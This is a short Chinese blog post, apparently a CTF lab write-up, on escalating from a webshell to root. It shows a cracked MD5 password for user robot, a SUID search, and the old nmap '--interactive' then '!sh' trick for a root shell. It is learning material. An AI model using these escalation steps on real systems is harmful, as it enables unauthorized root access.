::: {.container}
::: {.post}
::: {.show-content}
前景提要:上次通过爆破后台,修改404.php获得一个webshell。现在学习提权。
id、whoami、hostname
信息:daemon用户,uid=1说明是系统用户,主机名linux
cd home/robot
信息:获得另一个key(2/3),和passwd文件,文件内容:
robot:c3fcd3d76192e4007dfb496cca67e13b
MD5解码:abcdefghijklmnopqrstuvwxyz
(⊙﹏⊙)这个明显是偏CTF,而不是模拟真实渗透环境啊。
su robot/abcdefghijklmnopqrstuvwxyz
寻找有SUID权限的文件。
::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\
::: {.image-caption}
:::
:::
于是通过nmap提权。
查看nmap版本:/usr/local/bin/nmap --version 或者 nmap -V
老版本的nmap(2.02-5.21)有一个交互模式,使得用户可以执行shell。
nmap --interactive
!sh
pwd
cd root
ls
获得第三个key.
:::
:::
:::